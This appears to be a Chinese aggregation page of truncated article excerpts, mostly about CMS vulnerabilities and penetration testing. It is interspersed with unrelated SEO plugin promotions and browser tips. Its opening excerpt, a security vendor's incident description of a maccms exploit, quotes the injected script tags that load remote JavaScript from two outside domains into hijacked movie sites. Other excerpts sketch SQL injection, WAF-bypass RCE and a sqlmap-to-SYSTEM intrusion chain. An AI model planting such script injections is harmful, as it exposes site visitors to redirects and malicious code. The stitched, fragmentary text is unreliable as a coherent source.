苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>,尤其电影片名d_name值被直接篡改,并且是批量挂马,导致用户打开网站访问直接弹窗广告并跳转。
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
模板是网站的主题外观,也被称为主题或皮肤。通过使用不同的模板,网站的前台可以以不同的样式展示。这就像人们的服装一样,人们打扮得漂亮会吸引人,同样地,一个好看的模板不仅能吸引用户的第一眼,还可以更加人性化地展示网站的功能给用户。所以选择一个合适的模板对于网站的吸引力和用户体验非常重要。
2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们SINE安全寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux centos系统,苹果CMS版本是最新的V10版本,我们立即成立网站安全应急响应处理,帮助客户解决网站被攻击的问题。
目前苹果CMS官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们SINE安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms POC漏洞都有修复补丁。
今天突然想起来把数据库和图片都设置成远程,以节省主程序所在服务器的空间和流量占用,
文末答题赢福利 0x00 相关信息 源码信息:maccms8_mfb(苹果CMS视频分享程序 8.0 | 2017.09.27 发布) 源码下载:http://www.mycodes.net/47/7798.htm(官网http://www.maccms.com/down.html 已悄悄修复╮(╯▽╰)╭) 问题位置:maccms8_mfb\inc\common\function.php中htmlEncode方法 漏洞类型:前台SQL注入漏洞 0x01 审计过程 1.首先在maccms8_mfb
前几天,使用maccms建站的时候,错误的添加了一个采集的地址,结果采集出来的数据让我很是不满意,
设置maccms采集数据中的图片,保存到自己的FTP服务器,除了事先配置好服务器,还要在maccms程序后台进行上图所示操作,
[c-alert type="warning"]域名主机不一定非要在godaddy上购买,如果已经购买完成请直接跳过此步。[/c-alert]
海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑,手机,平板,APP多个终端入口,无任何加密代码,安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门建造看片网站的cms) 经历我多年**的经验,很多看小电影的网站都是用的这套cms或者maccms,因此是时候血洗小电影站点了 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。突破信息都已经上了回家了。。
苹果影视CMS采用Thinkphp框架+Mysql开发的视频点播系统,保证程序的稳定和效率。
资源采集网站 https://hongniuziyuan.com http://www.88zyw.net/
Nmap(网络映射器)是一款用于网络发现和安全审计的网络安全工具,它是自由软件。--维基百科
这一小段时间对一些 CMS 进行代码审计,和一些 CVE 分析复现。总结一下几个案例的问题产生原因和利用思路。由于能力有限,挖掘到的都并非高危漏洞,旨在总结一下思路。仅是个人的一些理解,有些表述不当的地方,还请各位斧正。
代码审计,考察的是扎扎实实的本领,CMS的漏洞的挖掘能力是衡量一个Web狗的强弱的标准,强网杯的时候,Web题目考的了一个CMS的代码审计,考察到了SSTI漏洞,菜鸡一枚的我过来汇总一下在PHP中的SSTI漏洞,望能抛砖引玉,引起读者的共鸣。
这里我以easycms的镜像为基础镜像: 下载地址: https://github.com/Medicean/VulApps/tree/master/c/cmseasy/1 这个是一个不错的开源项目,我们可以在它的基础上改进~。 docker pull medicean/vulapps:c_cmseasy_1 我们都知道 Git 的tag功能是为了将代码的某个状态打上一个戳,通过tag我们可以很轻易的找到对应的提交版本。 Docker 的tag似乎更加灵活,Docker 将文件等信息的变动抽象为一次次的c
前言本来不想讲这个事情,但是因为很多小白对这方面可能不太了解,所以讲一讲,关于鉴定网络上流传漏洞poc或exp的方法,原因是这二天关于cve-2019-0708这个漏洞,其实也不是头一次了。
织梦dedecms是站长使用得比较多的一个建站开源程序,正因如此,也是被被入侵挂马比较多的程序。下面就来跟大家说一下怎么重新命名dedecms的include文件夹以及plus文件夹来提高网站的安全性,减少被黑客软件扫描到漏洞的概率。 dedecms的漏洞主要集中在data、include、plus、dede、member几个文件夹中的php文件里,对于data这个文件夹我们可以把它移到网站的根目录外,dede可以冲命名,member可以删掉,一般用不着,special专题功能 install安装程序(必
上传到 /public/plugins/oauth 目录解压,然后在后台【系统】->【第三方登录】配置并开启即可。包含QQ、微信、支付宝、微博、百度5种登录方式。
信息搜集对于后续的渗透测试至关重要,信息的完整性决定着能否挖掘出网站漏洞,本篇文章将从几个方面讲解信息搜集的思路及技巧和具体的防范方法。
偶然间看到了这个漏洞,利用 80w 长度的垃圾字符填充,使正则回溯次数超过一定限度,导致绕过了360 模块的防御,本文主要介绍了正则回溯以及maccms v8 80w 字符RCE的详细分析。
对网站进行渗透并不是想的这么简单,相反,复杂又困难!在这里把对渗透的理解说一下吧!
用dedecms批量建站一般直接把文件打包复制,然后导入数据库,一个新网站就好了,但有时后台一直无法登录,提示验证码错误。那我们就想怎么把验证码关闭,现在就给大家解决织梦去掉后台登陆验证码。我们知道dedecms后台正常关闭验证是在【系统】→[验证码安全设置]→开启系统验证码,把【后台登陆】前的勾去掉就可以,但这个需要登录后台才能操作。其实只要用心你就会发现,在后台参数里修改验证参数,其实就等于修改网站内部的一个文件,只是在后台操作的选项有限,没有提供更多的修改接口,其实很多东西只是官方觉得没什么必要修
CMS(Content Management System,内容管理系统),又称整站系统或文章系统,用于网站内容管理。用户只需下载对应的CMS软件包,部署、搭建后就可以直接使用CMS。各CMS具有独特的结构命名规则和特定的文件内容。
http:/ping.aizhan.com/ http://ce.cloud.360.cn/
Whois是一个标准的互联网协议,可以收集网络注册信息,如域名、IP地址、服务商、域名拥有者、邮箱、电话、地址等。
•形如: www.xxx.com www.xxx.com/bbs www.xxx.com/old•渗透思路:网站可能有多个cms或框架组成,那么对于渗透而言,相当于渗透目标是多个(一个cms一个思路)
接触渗透时间,按暑假来算的话已经2个月多了,接触渗透几天,瞎打瞎闹拿了个shell,之后各种查资料查姿势,终于提权成功了。 然后就自认为渗透真简单,天天批量扫注入,提交漏洞平台。 之后慢慢深入发现渗透
文章开始前说下,Chrome 浏览器右键菜单的图片搜索最近改成了使用谷歌智能镜头搜索图片,有点鸡肋,开启chrome://flags/#enable-lens-region-search 即可恢复 。
0.背景分析 当今的互联网站点,各种cms和框架大规模普及,这虽然方便了广大站长,但是这些开源项目的安全性不容乐观,比如前一阵子的strutsII漏洞使各大平台和高校网站被入侵。 如今各大漏洞库的建立为我们提供了丰富的漏洞资源。国内有乌云网,sebug,国际上有CVE和exploit-db。我们可以从这些网站和各大安全论坛获得漏洞资源,编写利用程序。 那么我们既然有如此丰富的资源,为何不编写一款可扩展的集成各种漏洞扫描和利用功能的渗透测试平台呢。 我与很多国内的黑客讨论过,他们表示正在写或者有意向编写一
DEDECMS怎么样能快捷或者批量修改网站所有文章的超链接和锚文本,超链和所有关键词锚文本的链接需要修改?
为什么要用WP插件?如何利用WP插件让网站收录以及关键词排名。seo优化的重要两点就是内容和链接,其中链接又分为站内链接与站外链接两种,大家都知道外部链接对网站排名的重要性,同时也建议不要忽略了站内链接的作用。外部链接大部分情况下是不好控制的,而且要经过很长时间的积累,内部链接却完全在自己的控制之下。
为什么要用帝国CMS采集?如何利用帝国CMS采集让网站收录以及关键词排名。一个网站更新频率越高,搜索引擎蜘蛛就会来得越勤。所以我们可以借助帝国CMS采集实现自动采集伪原创发布以及主动推送给搜索引擎,来提高搜索引擎抓取的频次从而提高网站收录以及关键词排名。
批量删除腾讯专栏文章的脚本,腾讯云专栏签约后,抓取文章不插入原来连接,这个我怎么评价了呢!只好删除,走人了
为什么要用WP采集插件?如何利用WP采集插件让网站收录以及关键词排名。在做网站优化的时候能确保网站程序是最适合优化的吗,但它访问网页的时候针对的是网页的源代码。为更好地进行搜索引擎优化及更好地支持蜘蛛的抓取和爬行,需要对网页代码进行精简、优化以及对网页代码中的标签进行适当的优化。那么在seo中网页代码应如何优化?
https://github.com/EnableSecurity/wafw00f
为什么要用WordPress插件?如何利用WordPress插件让网站收录以及关键词排名。我们做优化不要只是在做表面,需要深入的研究,其实这个行业还是有着无穷的魅力。从最开始走来,从最开始的新鲜,不厌其烦的进行优化,到中间一段时间的怠倦,到现在又开始重新调整。我们在做任何事情都如这样,所以我们seo优化也需要的就是努力+坚持,这样我们才会得到丰收。
为什么要用dede插件?如何利用dede采集插件让网站收录以及关键词排名。所谓的“内容”。把他理解为网站的内部优化。内部优化不单单指网站的内容,它包含了很多方面。这其中需要注意的包括关键词分析部署、网
在goby乱扫的开始,我也是菜弟弟一样,看到什么都没感觉,直到有个师傅提醒了我:这不是Sprint boot框架么,洞这么多还拿不下?
从个人的角度去简单整理下打点前的信息收集那些事。从信息收集本质上来说多数内容都是大同小异,遇到坚壁时,不用死磕,毕竟条条大路通罗马。(大佬们也可以说说看法~向各位大佬学习!!)
我们的小团队对偶然发现的bc站点进行的渗透,从一开始只有sqlmap反弹的无回显os-shell到CS上线,到配合MSF上传脏土豆提权,到拿下SYSTEM权限的过程,分享记录一下渗透过程
PbootCms默认在header中放置了一个“X-Powered-By:PbootCms”标记。这个操作不影响PB的日常使用,一般情况SEOer会比较关注这个。
之前分享过很多命令行工具,比如BBDown下载b站视频最简单的方法,还能去水印 https://github.com/nilaoda/BBDown ,使用BBDown -tv https://www.bilibili.com/video/BV11S4y1T7ca 即可下载b站无水印视频:
当我们准备信息收集时,首选需要知道的是目标站的域名,然后在用whois查询查找域名所属者以及注册邮箱地址。 这里有几个在线whois查询的网站: https://www.whois.com http://whois.chinaz.com https://whois.aizhan.com 当然,有些域名有隐私保护,在我们查找到有用的信息时,把有用的信息保存下来。
领取专属 10元无门槛券
手把手带您无忧上云